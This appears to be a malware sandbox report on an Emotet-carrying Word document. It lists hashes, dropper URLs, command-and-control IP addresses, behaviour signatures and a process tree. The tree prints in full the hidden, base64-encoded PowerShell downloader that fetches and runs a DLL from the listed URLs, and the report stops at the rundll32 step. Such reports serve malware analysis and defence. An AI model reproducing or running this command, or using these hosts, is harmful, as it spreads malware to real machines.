Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

8

メリー�...��.doc

windows7_x64

10

メリー�...��.doc

windows10_x64

10

Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    22/12/2020, 00:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    メリークリスマス.doc

  • Size

    162KB

  • MD5

    71d9aa9f45329b844843dc8ee84abe80

  • SHA1

    064404ffb86f30dd0b1155ba9f61cfaf3cbb2e65

  • SHA256

    d7c3e71d5a6e9b66ffa6d4571a53f986b3c507b32557c0db8d855cd8c7fd1607

  • SHA512

    80410771ae1f979c6a39372ae1f3e045fdffef4e125cd1edf5a800cb13513e636c7daf03489eb796f2e483b7cb97d190239318187c954fd0b8ff7c71d1de6291

Score
10/10
emotetepoch3bankertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://aktuel.marduk.kim/dooxi-fuel-hf09b/Logs/
exe.dropper

http://braam.com.br/c/oaA7YWWX/
exe.dropper

http://zebaorganics.com/wp-admin/en-US/
exe.dropper

http://friendsofchrist10.com/streamlabs-obs-rarso/SIGNUP/
exe.dropper

http://guojiazui.com/b/y0QnnWbk/
exe.dropper

http://fi.bonitastores.com/n/WUGoZ/
exe.dropper

http://iog.com.cn/css/Sys/

Extracted

Family

emotet

Botnet

Epoch3

C2

172.193.14.201:80

77.89.249.254:443

203.157.152.9:7080

157.245.145.87:443

195.159.28.244:8080

115.79.195.246:80

163.53.204.180:443

88.119.191.111:80

46.105.131.68:8080

110.37.224.243:80

117.2.139.117:443

172.104.46.84:8080

185.142.236.163:443

37.46.129.215:8080

195.201.56.70:8080

2.82.75.215:80

178.33.167.120:8080

8.4.9.137:8080

203.153.216.178:7080

139.59.12.63:8080
rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
    adwarespyware
  • Modifies registry class 280 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\メリークリスマス.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1064
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1928
    • C:\Windows\system32\cmd.exe
      cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IABzAGUAVAAtAGkAdABFAG0AIAAgACgAIgB2ACIAKwAiAEEAUgAiACsAIgBJAEEAIgArACIAYgBMAEUAOgBvAGwAVQAiACsAIgAzAGoAIgApACAAIAAoACAAIABbAHQAeQBQAEUAXQAoACIAewA0AH0AewAyAH0AewAzAH0AewAwAH0AewAxAH0AIgAtAGYAIAAnAE8AJwAsACcAUgB5ACcALAAnAEkATwAuAGQAJwAsACcAaQByAGUAYwB0ACcALAAnAFMAWQBTAHQAZQBtAC4AJwApACkAIAA7ACAAIAAgACQAZwBRAEEAVgBJAHoAPQAgAFsAdAB5AFAARQBdACgAIgB7ADUAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADEAfQB7ADIAfQAiACAALQBGACAAJwAuAG4ARQBUAC4AJwAsACcARQBwAE8AJwAsACcASQBOAFQAbQBBAE4AQQBHAGUAcgAnACwAJwBZAFMAVABFAG0AJwAsACcAUwBlAFIAdgBpAEMAJwAsACcAcwAnACkAIAAgADsAJABHAGUAcwBzAHoAeABrAD0AKAAnAFEAZQAnACsAKAAnAHIAdAB4ACcAKwAnAGUAdgAnACkAKQA7ACQATQBzAHcAaABkAHUAawA9ACQATgA5AHIAOQBtAGEAZAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQASQA2AGkAdgBlADgAawA7ACQATABlADAAXwBiADQAeQA9ACgAJwBSACcAKwAoACcAdwBiACcAKwAnADcAcwBuACcAKQArACcAcwAnACkAOwAgACgAIABHAEUAdAAtAFYAQQByAGkAYQBCAGwAZQAgACgAIgBvAEwAVQAzACIAKwAiAGoAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAEMAYABSAGUAYABBAGAAVABlAGQAYABJAHIAZQBDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBtACcAKwAoACcAbwB3AEsAJwArACcAMAAnACkAKwAnADYAeQAnACsAKAAnAGEAMAA4ACcAKwAnAG0AbwB3ACcAKQArACgAJwBOADQAJwArACcAZwAnACkAKwAnAGQAegAnACsAKAAnAG4AJwArACcAYwBtAG8AdwAnACkAKQAtAGMAcgBlAFAATABBAEMAZQAgACAAKAAnAG0AbwAnACsAJwB3ACcAKQAsAFsAYwBoAGEAcgBdADkAMgApACkAOwAkAEYAcgB2ADIANwBmAGYAPQAoACcAQQBnACcAKwAoACcAZwAnACsAJwA1AG8AMQBlACcAKQApADsAIAAkAGcAUQBhAFYASQB6ADoAOgAiAFMAYABlAGMAdQBgAFIAaQBUAHkAYABwAHIAbwBgAFQATwBDAE8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVgBtAGQAcwBmAHcAegA9ACgAJwBHADEAJwArACgAJwBqADEAJwArACcAMAAnACkAKwAnAGgANQAnACkAOwAkAEgAaABfADMAbwBsAGEAIAA9ACAAKAAnAEkAJwArACcANQBuACcAKwAoACcAeQBsACcAKwAnAHUAagBrAF8AJwApACkAOwAkAFoANwB3ADUAbgAwAHMAPQAoACcAQgBmACcAKwAnAGoAYQAnACsAKAAnAGsAdwAnACsAJwAzACcAKQApADsAJABNAGYANwBwAGoANQBtAD0AKAAnAE0AdgAnACsAKAAnAG0AJwArACcAcQBvACcAKQArACcAawBjACcAKQA7ACQASAA0AGsANwA3AGcAegA9ACQASABPAE0ARQArACgAKAAnADEAJwArACcARgAnACsAJwBMACcAKwAoACcASwAwADYAJwArACcAeQBhACcAKwAnADAAOAAxAEYATAAnACsAJwBOACcAKQArACcANAAnACsAKAAnAGcAZAAnACsAJwB6ACcAKQArACgAJwBuACcAKwAnAGMAMQBGAEwAJwApACkAIAAgAC0AYwBSAGUAcABsAEEAQwBlACgAWwBDAGgAYQBSAF0ANAA5ACsAWwBDAGgAYQBSAF0ANwAwACsAWwBDAGgAYQBSAF0ANwA2ACkALABbAEMAaABhAFIAXQA5ADIAKQArACQASABoAF8AMwBvAGwAYQArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAE4AbwB4ADQAZABwAG4APQAoACgAJwBGACcAKwAnAHgAZgB5ACcAKQArACcAegBtACcAKwAnAHUAJwApADsAJABKADYAcwByADgAMABpAD0ATgBgAGUAVwAtAG8AYgBgAEoAZQBgAGMAVAAgAE4ARQB0AC4AVwBlAEIAQwBMAEkARQBuAFQAOwAkAFIAOQBoADQAegB5AG8APQAoACgAKAAoACcAaAB0AHQAJwArACcAcAA6AEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoACcAKwAnAEoAJwArACcAKQAoADMAcwAyACkAKABhACcAKQApACsAJwBrAHQAJwArACcAdQAnACsAJwBlACcAKwAoACcAbAAuAG0AJwArACcAYQAnACkAKwAnAHIAZAAnACsAKAAoACcAdQBrAC4AawBpAG0ASgAnACsAJwApACcAKwAnACgAMwBzADIAJwArACcAKQAoAGQAbwAnACsAJwBvACcAKQApACsAJwB4AGkAJwArACgAKAAnAC0AZgB1AGUAbAAnACsAJwAtAGgAZgAwACcAKwAnADkAJwArACcAYgBKACcAKwAnACkAJwArACcAKAAzAHMAMgApACcAKQApACsAKAAoACcAKABMAG8AZwBzAEoAJwArACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACcAKAAnACsAKAAoACcAQABoAHQAdAAnACsAJwBwADoASgApACcAKwAnACgAMwBzADIAKQAoAEoAJwArACcAKQAoADMAJwArACcAcwAyACkAJwArACcAKABiAHIAYQBhAG0ALgBjACcAKwAnAG8AJwApACkAKwAoACgAJwBtAC4AYgByAEoAJwArACcAKQAoADMAJwArACcAcwAyACcAKQApACsAJwApACcAKwAnACgAJwArACgAKAAnAGMASgAnACsAJwApACgAMwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAG8AYQAnACsAJwBBADcAWQAnACkAKwAoACcAVwAnACsAJwBXAFgAJwApACsAJwBKACcAKwAoACgAJwApACgAJwArACcAMwAnACkAKQArACcAcwAyACcAKwAoACgAJwApACcAKwAnACgAQABoAHQAdABwACcAKwAnADoASgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAJwArACcAcwAyACkAKABKACkAKAAnACsAJwAzAHMAMgApACgAegAnACkAKQArACcAZQAnACsAKAAnAGIAJwArACcAYQBvAHIAZwBhAG4AJwArACcAaQAnACkAKwAoACcAYwAnACsAJwBzAC4AJwApACsAKAAnAGMAbwBtACcAKwAnAEoAJwApACsAKAAoACcAKQAoACcAKwAnADMAcwAnACkAKQArACgAKAAnADIAKQAoACcAKwAnAHcAJwApACkAKwAoACcAcAAtAGEAZAAnACsAJwBtACcAKQArACgAKAAnAGkAbgBKACkAJwArACcAKAAnACkAKQArACgAKAAnADMAcwAyACkAJwArACcAKABlACcAKwAnAG4ALQBVAFMAJwApACkAKwAoACgAJwBKACcAKwAnACkAKAAzACcAKwAnAHMAMgApACgAJwApACkAKwAoACcAQAAnACsAJwBoAHQAdAAnACkAKwAnAHAAJwArACgAKAAnADoASgApACgAMwAnACsAJwBzACcAKwAnADIAJwApACkAKwAoACgAJwApACgASgAnACsAJwApACcAKQApACsAKAAnACgAJwArACcAMwBzADIAKQAnACkAKwAnACgAJwArACcAZgAnACsAJwByAGkAJwArACgAKAAnAGUAJwArACcAbgAnACsAJwBkAHMAbwBmAGMAaAByAGkAcwB0ADEAMAAuAGMAbwAnACsAJwBtAEoAKQAoACcAKwAnADMAcwAyACkAJwApACkAKwAnACgAJwArACgAJwBzACcAKwAnAHQAcgAnACkAKwAoACcAZQBhAG0AbAAnACsAJwBhAGIAcwAtACcAKwAnAG8AJwArACcAYgAnACkAKwAnAHMAJwArACcALQByACcAKwAoACcAYQAnACsAJwByAHMAbwBKACcAKQArACcAKQAnACsAKAAoACcAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAJwArACcAKAAnACsAJwBTAEkARwBOAFUAUAAnACkAKQArACgAKAAnAEoAKQAoADMAJwArACcAcwAyACkAJwApACkAKwAoACgAJwAoACcAKwAnAEAAaAAnACkAKQArACcAdAAnACsAKAAoACcAdAAnACsAJwBwADoASgAnACsAJwApACgAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcASgApACgAMwBzACcAKQApACsAKAAoACcAMgApACgAZwB1ACcAKwAnAG8AagAnACsAJwBpAGEAJwApACkAKwAoACcAegB1ACcAKwAnAGkALgBjAG8AbQBKACcAKQArACgAKAAnACkAKAAzACcAKwAnAHMAJwApACkAKwAnADIAJwArACgAKAAnACkAJwArACcAKAAnACsAJwBiAEoAKQAoACcAKQApACsAKAAoACcAMwBzADIAKQAoAHkAJwArACcAMABRAG4AbgBXACcAKwAnAGIAawBKACcAKwAnACkAKAAnACkAKQArACgAKAAnADMAcwAyACcAKwAnACkAKABAAGgAJwApACkAKwAnAHQAJwArACgAKAAnAHQAcAA6AEoAKQAnACsAJwAoACcAKwAnADMAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEoAKQAnACsAJwAoADMAJwArACcAcwAyACkAKABmAGkAJwApACkAKwAoACcALgAnACsAJwBiAG8AbgBpACcAKwAnAHQAYQBzACcAKQArACcAdABvACcAKwAoACcAcgBlAHMAJwArACcALgAnACkAKwAoACgAJwBjAG8AbQBKACcAKwAnACkAJwArACcAKAAnACsAJwAzAHMAJwArACcAMgApACgAbgBKACkAKAAzAHMAMgAnACsAJwApACgAJwArACcAVwAnACkAKQArACgAJwBVAEcAJwArACcAbwBaAEoAJwApACsAKAAoACcAKQAoADMAJwArACcAcwAyACkAJwArACcAKABAACcAKQApACsAJwBoACcAKwAnAHQAJwArACcAdABwACcAKwAoACgAJwA6AEoAJwArACcAKQAoACcAKQApACsAKAAoACcAMwAnACsAJwBzADIAKQAoAEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzADIAJwApACkAKwAoACgAJwApACcAKwAnACgAaQBvAGcAJwApACkAKwAoACcALgAnACsAJwBjAG8AbQAuACcAKQArACcAYwBuACcAKwAoACgAJwBKACkAJwArACcAKAAzAHMAMgAnACsAJwApACcAKQApACsAKAAoACcAKABjAHMAJwArACcAcwBKACkAJwArACcAKAAnACkAKQArACgAJwAzACcAKwAnAHMAMgAnACkAKwAnACkAJwArACgAKAAnACgAUwAnACkAKQArACgAKAAnAHkAcwBKACcAKwAnACkAKAAnACkAKQArACgAJwAzACcAKwAnAHMAMgAnACkAKwAoACgAJwApACgAJwApACkAKQApAC4AIgByAGUAYABQAGwAYQBgAGMARQAiACgAKAAoACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoACcAKQApACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcALwAnACkALAAoACcAaAB3ACcAKwAnAGUAJwApACkAWwAwAF0AKQAuACIAUwBgAHAAbABpAFQAIgAoACQAVwBxAGMAZQBwAHYAcgAgACsAIAAkAE0AcwB3AGgAZAB1AGsAIAArACAAJABPAG8AbQAzAHcAYgA5ACkAOwAkAEMAcQByADcAXwBfADMAPQAoACcAVQAnACsAKAAnAHUAJwArACcAZwB3AHkAJwApACsAJwB5AHQAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABOAHgAZAAwAGIAaQBtACAAaQBuACAAJABSADkAaAA0AHoAeQBvACAAfAAgAHMAbwBSAGAAVAAtAGAATwBgAEIAagBlAGAAQwB0ACAAewBHAEUAdAAtAGAAUgBhAGAATgBgAEQAbwBNAH0AKQB7AHQAcgB5AHsAJABKADYAcwByADgAMABpAC4AIgBkAG8AdwBuAGwAbwBgAEEAYABEAGYASQBgAGwAZQAiACgAJABOAHgAZAAwAGIAaQBtACwAIAAkAEgANABrADcANwBnAHoAKQA7ACQAQQB2AHYAMABpADAAbwA9ACgAJwBYACcAKwAnAHIAagAnACsAKAAnADEAJwArACcAZAB2ADEAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQASAA0AGsANwA3AGcAegApAC4AIgBsAGUAYABOAGcAdABIACIAIAAtAGcAZQAgADMAMwA0ADQAMgApACAAewAuACgAJwByAHUAbgBkACcAKwAnAGwAJwArACcAbAAzADIAJwApACAAJABIADQAawA3ADcAZwB6ACwAJwAjADEAJwAuACIAVABPAHMAYABUAHIAaQBgAE4ARwAiACgAKQA7ACQASwB2AGoANgB5ADMAOAA9ACgAJwBBACcAKwAoACcAbQA2AG8AJwArACcANgAnACkAKwAnAHMANwAnACkAOwBiAHIAZQBhAGsAOwAkAEUAMgBhAHIAXwB1AGYAPQAoACcATgAwACcAKwAoACcAcwAxACcAKwAnAGMAMABoACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABBADgAagBjAGsAbABuAD0AKAAnAFIAJwArACgAJwBrACcAKwAnAGgAdwAnACkAKwAoACcAdAAnACsAJwB1AGIAJwApACkA
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1504
      • C:\Windows\system32\msg.exe
        msg Admin /v Word experienced an error trying to open the file.
        2⤵
          PID:1512
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          POwersheLL -w hidden -ENCOD IABzAGUAVAAtAGkAdABFAG0AIAAgACgAIgB2ACIAKwAiAEEAUgAiACsAIgBJAEEAIgArACIAYgBMAEUAOgBvAGwAVQAiACsAIgAzAGoAIgApACAAIAAoACAAIABbAHQAeQBQAEUAXQAoACIAewA0AH0AewAyAH0AewAzAH0AewAwAH0AewAxAH0AIgAtAGYAIAAnAE8AJwAsACcAUgB5ACcALAAnAEkATwAuAGQAJwAsACcAaQByAGUAYwB0ACcALAAnAFMAWQBTAHQAZQBtAC4AJwApACkAIAA7ACAAIAAgACQAZwBRAEEAVgBJAHoAPQAgAFsAdAB5AFAARQBdACgAIgB7ADUAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADEAfQB7ADIAfQAiACAALQBGACAAJwAuAG4ARQBUAC4AJwAsACcARQBwAE8AJwAsACcASQBOAFQAbQBBAE4AQQBHAGUAcgAnACwAJwBZAFMAVABFAG0AJwAsACcAUwBlAFIAdgBpAEMAJwAsACcAcwAnACkAIAAgADsAJABHAGUAcwBzAHoAeABrAD0AKAAnAFEAZQAnACsAKAAnAHIAdAB4ACcAKwAnAGUAdgAnACkAKQA7ACQATQBzAHcAaABkAHUAawA9ACQATgA5AHIAOQBtAGEAZAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQASQA2AGkAdgBlADgAawA7ACQATABlADAAXwBiADQAeQA9ACgAJwBSACcAKwAoACcAdwBiACcAKwAnADcAcwBuACcAKQArACcAcwAnACkAOwAgACgAIABHAEUAdAAtAFYAQQByAGkAYQBCAGwAZQAgACgAIgBvAEwAVQAzACIAKwAiAGoAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAEMAYABSAGUAYABBAGAAVABlAGQAYABJAHIAZQBDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBtACcAKwAoACcAbwB3AEsAJwArACcAMAAnACkAKwAnADYAeQAnACsAKAAnAGEAMAA4ACcAKwAnAG0AbwB3ACcAKQArACgAJwBOADQAJwArACcAZwAnACkAKwAnAGQAegAnACsAKAAnAG4AJwArACcAYwBtAG8AdwAnACkAKQAtAGMAcgBlAFAATABBAEMAZQAgACAAKAAnAG0AbwAnACsAJwB3ACcAKQAsAFsAYwBoAGEAcgBdADkAMgApACkAOwAkAEYAcgB2ADIANwBmAGYAPQAoACcAQQBnACcAKwAoACcAZwAnACsAJwA1AG8AMQBlACcAKQApADsAIAAkAGcAUQBhAFYASQB6ADoAOgAiAFMAYABlAGMAdQBgAFIAaQBUAHkAYABwAHIAbwBgAFQATwBDAE8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVgBtAGQAcwBmAHcAegA9ACgAJwBHADEAJwArACgAJwBqADEAJwArACcAMAAnACkAKwAnAGgANQAnACkAOwAkAEgAaABfADMAbwBsAGEAIAA9ACAAKAAnAEkAJwArACcANQBuACcAKwAoACcAeQBsACcAKwAnAHUAagBrAF8AJwApACkAOwAkAFoANwB3ADUAbgAwAHMAPQAoACcAQgBmACcAKwAnAGoAYQAnACsAKAAnAGsAdwAnACsAJwAzACcAKQApADsAJABNAGYANwBwAGoANQBtAD0AKAAnAE0AdgAnACsAKAAnAG0AJwArACcAcQBvACcAKQArACcAawBjACcAKQA7ACQASAA0AGsANwA3AGcAegA9ACQASABPAE0ARQArACgAKAAnADEAJwArACcARgAnACsAJwBMACcAKwAoACcASwAwADYAJwArACcAeQBhACcAKwAnADAAOAAxAEYATAAnACsAJwBOACcAKQArACcANAAnACsAKAAnAGcAZAAnACsAJwB6ACcAKQArACgAJwBuACcAKwAnAGMAMQBGAEwAJwApACkAIAAgAC0AYwBSAGUAcABsAEEAQwBlACgAWwBDAGgAYQBSAF0ANAA5ACsAWwBDAGgAYQBSAF0ANwAwACsAWwBDAGgAYQBSAF0ANwA2ACkALABbAEMAaABhAFIAXQA5ADIAKQArACQASABoAF8AMwBvAGwAYQArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAE4AbwB4ADQAZABwAG4APQAoACgAJwBGACcAKwAnAHgAZgB5ACcAKQArACcAegBtACcAKwAnAHUAJwApADsAJABKADYAcwByADgAMABpAD0ATgBgAGUAVwAtAG8AYgBgAEoAZQBgAGMAVAAgAE4ARQB0AC4AVwBlAEIAQwBMAEkARQBuAFQAOwAkAFIAOQBoADQAegB5AG8APQAoACgAKAAoACcAaAB0AHQAJwArACcAcAA6AEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoACcAKwAnAEoAJwArACcAKQAoADMAcwAyACkAKABhACcAKQApACsAJwBrAHQAJwArACcAdQAnACsAJwBlACcAKwAoACcAbAAuAG0AJwArACcAYQAnACkAKwAnAHIAZAAnACsAKAAoACcAdQBrAC4AawBpAG0ASgAnACsAJwApACcAKwAnACgAMwBzADIAJwArACcAKQAoAGQAbwAnACsAJwBvACcAKQApACsAJwB4AGkAJwArACgAKAAnAC0AZgB1AGUAbAAnACsAJwAtAGgAZgAwACcAKwAnADkAJwArACcAYgBKACcAKwAnACkAJwArACcAKAAzAHMAMgApACcAKQApACsAKAAoACcAKABMAG8AZwBzAEoAJwArACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACcAKAAnACsAKAAoACcAQABoAHQAdAAnACsAJwBwADoASgApACcAKwAnACgAMwBzADIAKQAoAEoAJwArACcAKQAoADMAJwArACcAcwAyACkAJwArACcAKABiAHIAYQBhAG0ALgBjACcAKwAnAG8AJwApACkAKwAoACgAJwBtAC4AYgByAEoAJwArACcAKQAoADMAJwArACcAcwAyACcAKQApACsAJwApACcAKwAnACgAJwArACgAKAAnAGMASgAnACsAJwApACgAMwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAG8AYQAnACsAJwBBADcAWQAnACkAKwAoACcAVwAnACsAJwBXAFgAJwApACsAJwBKACcAKwAoACgAJwApACgAJwArACcAMwAnACkAKQArACcAcwAyACcAKwAoACgAJwApACcAKwAnACgAQABoAHQAdABwACcAKwAnADoASgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAJwArACcAcwAyACkAKABKACkAKAAnACsAJwAzAHMAMgApACgAegAnACkAKQArACcAZQAnACsAKAAnAGIAJwArACcAYQBvAHIAZwBhAG4AJwArACcAaQAnACkAKwAoACcAYwAnACsAJwBzAC4AJwApACsAKAAnAGMAbwBtACcAKwAnAEoAJwApACsAKAAoACcAKQAoACcAKwAnADMAcwAnACkAKQArACgAKAAnADIAKQAoACcAKwAnAHcAJwApACkAKwAoACcAcAAtAGEAZAAnACsAJwBtACcAKQArACgAKAAnAGkAbgBKACkAJwArACcAKAAnACkAKQArACgAKAAnADMAcwAyACkAJwArACcAKABlACcAKwAnAG4ALQBVAFMAJwApACkAKwAoACgAJwBKACcAKwAnACkAKAAzACcAKwAnAHMAMgApACgAJwApACkAKwAoACcAQAAnACsAJwBoAHQAdAAnACkAKwAnAHAAJwArACgAKAAnADoASgApACgAMwAnACsAJwBzACcAKwAnADIAJwApACkAKwAoACgAJwApACgASgAnACsAJwApACcAKQApACsAKAAnACgAJwArACcAMwBzADIAKQAnACkAKwAnACgAJwArACcAZgAnACsAJwByAGkAJwArACgAKAAnAGUAJwArACcAbgAnACsAJwBkAHMAbwBmAGMAaAByAGkAcwB0ADEAMAAuAGMAbwAnACsAJwBtAEoAKQAoACcAKwAnADMAcwAyACkAJwApACkAKwAnACgAJwArACgAJwBzACcAKwAnAHQAcgAnACkAKwAoACcAZQBhAG0AbAAnACsAJwBhAGIAcwAtACcAKwAnAG8AJwArACcAYgAnACkAKwAnAHMAJwArACcALQByACcAKwAoACcAYQAnACsAJwByAHMAbwBKACcAKQArACcAKQAnACsAKAAoACcAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAJwArACcAKAAnACsAJwBTAEkARwBOAFUAUAAnACkAKQArACgAKAAnAEoAKQAoADMAJwArACcAcwAyACkAJwApACkAKwAoACgAJwAoACcAKwAnAEAAaAAnACkAKQArACcAdAAnACsAKAAoACcAdAAnACsAJwBwADoASgAnACsAJwApACgAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcASgApACgAMwBzACcAKQApACsAKAAoACcAMgApACgAZwB1ACcAKwAnAG8AagAnACsAJwBpAGEAJwApACkAKwAoACcAegB1ACcAKwAnAGkALgBjAG8AbQBKACcAKQArACgAKAAnACkAKAAzACcAKwAnAHMAJwApACkAKwAnADIAJwArACgAKAAnACkAJwArACcAKAAnACsAJwBiAEoAKQAoACcAKQApACsAKAAoACcAMwBzADIAKQAoAHkAJwArACcAMABRAG4AbgBXACcAKwAnAGIAawBKACcAKwAnACkAKAAnACkAKQArACgAKAAnADMAcwAyACcAKwAnACkAKABAAGgAJwApACkAKwAnAHQAJwArACgAKAAnAHQAcAA6AEoAKQAnACsAJwAoACcAKwAnADMAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEoAKQAnACsAJwAoADMAJwArACcAcwAyACkAKABmAGkAJwApACkAKwAoACcALgAnACsAJwBiAG8AbgBpACcAKwAnAHQAYQBzACcAKQArACcAdABvACcAKwAoACcAcgBlAHMAJwArACcALgAnACkAKwAoACgAJwBjAG8AbQBKACcAKwAnACkAJwArACcAKAAnACsAJwAzAHMAJwArACcAMgApACgAbgBKACkAKAAzAHMAMgAnACsAJwApACgAJwArACcAVwAnACkAKQArACgAJwBVAEcAJwArACcAbwBaAEoAJwApACsAKAAoACcAKQAoADMAJwArACcAcwAyACkAJwArACcAKABAACcAKQApACsAJwBoACcAKwAnAHQAJwArACcAdABwACcAKwAoACgAJwA6AEoAJwArACcAKQAoACcAKQApACsAKAAoACcAMwAnACsAJwBzADIAKQAoAEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzADIAJwApACkAKwAoACgAJwApACcAKwAnACgAaQBvAGcAJwApACkAKwAoACcALgAnACsAJwBjAG8AbQAuACcAKQArACcAYwBuACcAKwAoACgAJwBKACkAJwArACcAKAAzAHMAMgAnACsAJwApACcAKQApACsAKAAoACcAKABjAHMAJwArACcAcwBKACkAJwArACcAKAAnACkAKQArACgAJwAzACcAKwAnAHMAMgAnACkAKwAnACkAJwArACgAKAAnACgAUwAnACkAKQArACgAKAAnAHkAcwBKACcAKwAnACkAKAAnACkAKQArACgAJwAzACcAKwAnAHMAMgAnACkAKwAoACgAJwApACgAJwApACkAKQApAC4AIgByAGUAYABQAGwAYQBgAGMARQAiACgAKAAoACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoACcAKQApACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcALwAnACkALAAoACcAaAB3ACcAKwAnAGUAJwApACkAWwAwAF0AKQAuACIAUwBgAHAAbABpAFQAIgAoACQAVwBxAGMAZQBwAHYAcgAgACsAIAAkAE0AcwB3AGgAZAB1AGsAIAArACAAJABPAG8AbQAzAHcAYgA5ACkAOwAkAEMAcQByADcAXwBfADMAPQAoACcAVQAnACsAKAAnAHUAJwArACcAZwB3AHkAJwApACsAJwB5AHQAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABOAHgAZAAwAGIAaQBtACAAaQBuACAAJABSADkAaAA0AHoAeQBvACAAfAAgAHMAbwBSAGAAVAAtAGAATwBgAEIAagBlAGAAQwB0ACAAewBHAEUAdAAtAGAAUgBhAGAATgBgAEQAbwBNAH0AKQB7AHQAcgB5AHsAJABKADYAcwByADgAMABpAC4AIgBkAG8AdwBuAGwAbwBgAEEAYABEAGYASQBgAGwAZQAiACgAJABOAHgAZAAwAGIAaQBtACwAIAAkAEgANABrADcANwBnAHoAKQA7ACQAQQB2AHYAMABpADAAbwA9ACgAJwBYACcAKwAnAHIAagAnACsAKAAnADEAJwArACcAZAB2ADEAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQASAA0AGsANwA3AGcAegApAC4AIgBsAGUAYABOAGcAdABIACIAIAAtAGcAZQAgADMAMwA0ADQAMgApACAAewAuACgAJwByAHUAbgBkACcAKwAnAGwAJwArACcAbAAzADIAJwApACAAJABIADQAawA3ADcAZwB6ACwAJwAjADEAJwAuACIAVABPAHMAYABUAHIAaQBgAE4ARwAiACgAKQA7ACQASwB2AGoANgB5ADMAOAA9ACgAJwBBACcAKwAoACcAbQA2AG8AJwArACcANgAnACkAKwAnAHMANwAnACkAOwBiAHIAZQBhAGsAOwAkAEUAMgBhAHIAXwB1AGYAPQAoACcATgAwACcAKwAoACcAcwAxACcAKwAnAGMAMABoACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABBADgAagBjAGsAbABuAD0AKAAnAFIAJwArACgAJwBrACcAKwAnAGgAdwAnACkAKwAoACcAdAAnACsAJwB1AGIAJwApACkA
          2⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1780
          • C:\Windows\system32\rundll32.exe
